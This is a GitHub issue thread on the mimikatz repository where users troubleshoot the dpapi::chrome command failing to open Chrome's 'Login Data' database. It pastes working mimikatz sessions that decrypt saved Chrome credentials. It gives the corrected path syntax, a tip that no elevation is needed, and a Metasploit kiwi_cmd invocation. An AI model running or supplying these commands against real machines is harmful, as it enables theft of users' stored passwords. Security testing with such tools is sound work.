gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz

ERROR kuhl_m_dpapi_chrome #251

Closed Papotito123 closed 4 years ago

Papotito123 commented 4 years ago

Hello: I am opening this new issue about dpapi::chrome.

C:\Users\TESTACCOUNT\Downloads\mimikatz 2.2.0 20200104 - lsadump & Chrome\mimikatz_trunk (1)\x64>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 Jan  4 2020 18:59:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1 /unprotect
ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\google\chrome\USERDA~1\default\LOGIND~1)

mimikatz # dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1 /protect
ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\google\chrome\USERDA~1\default\LOGIND~1)

Chrome logins are retrievable with other tools.

Thanks.

gentilkiwi commented 4 years ago

Why can't you paste nice output :') I edited your message.

You know the help for the command says: /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data", with "" around the full path? Why don't you use it instead of this Windows 95 old-school-style path name? :')

Papotito123 commented 4 years ago

Hello: Thanks for the response. I have been using this Windows 95 look-alike command without "" for more than 1 year and it was working well. But I will take your hint and try it.

I posted what I thought was better than my explanation, which is the output of your tool.

I am using Windows 10 1809 x64 physical machine.

So much thanks for reply.

Papotito123 commented 4 years ago

Hello; I ran mimikatz 2.2.0 20200104 - lsadump & Chrome on a Win 10 1809 x64 OS with Avast disabled, in a cmd run as Admin. As you suggested, I tried it with your hint. This is the cmd output:

Microsoft Windows [Version 10.0.17763.914]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd "C:\Users\TESTACCOUNT\Downloads\mimikatz 2.2.0 20200104 - lsadump & Chrome\mimikatz_trunk (1)\x64"

C:\Users\TESTACCOUNT\Downloads\mimikatz 2.2.0 20200104 - lsadump & Chrome\mimikatz_trunk (1)\x64>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 Jan  4 2020 18:59:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1 /unprotect
ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\google\chrome\USERDA~1\default\LOGIND~1)

mimikatz # dpapi::chrome /in:"%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" /unprotect
ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\google\chrome\USERDA~1\default\LOGIND~1)

mimikatz # dpapi::chrome /in:""%localappdata%\google\chrome\USERDA~1\default\LOGIND~1"" /unprotect
ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\google\chrome\USERDA~1\default\LOGIND~1)

mimikatz # dpapi::chrome /in:""C:\Users\TESTACCOUNT\AppData\Local\Google\Chrome\User Data\Default\Login Data"" /unprotect
ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\Google\Chrome\User)

mimikatz # dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect


C:\Users\TESTACCOUNT\Downloads\mimikatz 2.2.0 20200104 - lsadump & Chrome\mimikatz_trunk (1)\x64>

Did you see that I can run the same command for cookies and it works? What intrigues me is why I can run 5 other Chrome recovery tools with success, while mimikatz fails to open the Login Data file but can still open cookies.

I also ran mimikatz in a VirtualBox Windows 10 1809 x64 VM with Avast disabled. This is the cmd output:

Microsoft Windows [Version 10.0.17763.914]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd "C:\Users\testuser\Desktop\mimikatz 2.2.0 20200104 - lsadump & Chrome\mimikatz_trunk (1)\x64"

C:\Users\testuser\Desktop\mimikatz 2.2.0 20200104 - lsadump & Chrome\mimikatz_trunk (1)\x64>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 Jan  4 2020 18:59:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1 /unprotect

URL : https://login.live.com/ ( https://login.live.com/login.srf ) Username: xxxxxxxxxx@outlook.com

URL : https://login.live.com/ ( https://login.live.com/login.srf ) Username: xxxxxxxxxx@hotmail.com

mimikatz #

I want to use the simple old syntax with cmd/bat, and PowerShell commands as little as possible, just to have the benefit of running from Windows 7 to the latest Windows 10 with the highest margin of success. I have been using mimikatz since 2012.

Thanks for responding and for any help.

gentilkiwi commented 4 years ago

As indicated in my previous message, use the syntax: dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data"

Papotito123 commented 4 years ago

Hello: I ran mimikatz without quotes, with single quotes and with double quotes, and it did the same: ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\Google\Chrome\User)

Did you read the part where I mention that I ran mimikatz in a VirtualBox Win 10 1809 x64 VM, that it worked there, and that I also posted the output?

Thanks for taking time.

Papotito123 commented 4 years ago

Hello: Sorry, it was not my intention to close the issue. I'm posting from a smartphone.

gentilkiwi commented 4 years ago

ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\Google\Chrome\User) indicates that you don't type my command in mimikatz. Stop doing batch if you don't know how to escape and/or use them.

Papotito123 commented 4 years ago

Hello; To be honest, you were right about the command syntax not being good. I have been using it this way from the very moment you released dpapi::chrome /unprotect. But don't worry. I managed to use another syntax that works well. Chrome accounts are being recovered as usual.

Thanks for your patience.

merrychrishna commented 3 years ago

> Hello; To be honest, you were right about the command syntax not being good. I have been using it this way from the very moment you released dpapi::chrome /unprotect. But don't worry. I managed to use another syntax that works well. Chrome accounts are being recovered as usual.
>
> Thanks for your patience.

What other syntax did you use? I'm having the same problem, so I would like to know.

Papotito123 commented 3 years ago

Hello: Well... This issue, as for me, seems to be Defender doing something in the background even if disabled.

The format I'm using is: dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data/Default\Login Data" /unprotect

This is working as is on my Win 1909 and Win 20H1. For some reason it was failing when using the short env path, so I don't use it.

A little tip. To use this dpapi::chrome command it is not necessary to run privilege::debug first. Also, you can run this from a standard user account without running mimikatz elevated (Run As ...).

ForDockerImage commented 3 years ago

Hello,

I run mimikatz from a ".rc" script in Metasploit in the following way: <ruby> run_single("kiwi_cmd \"dpapi::chrome /in:'%localappdata%\\Google\\Chrome\\User Data\\Default\\Login Data' /unprotect\"") </ruby>

Error: ERROR kull_m_file_readGeneric ; kull_m_string_quick_base64_to_Binary (0x0000000d) ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file ('C:\Users\Tester\AppData\Local\Google\Chrome\User)

Why does mimikatz process the path only up to the first space? PS: sorry for my bad English.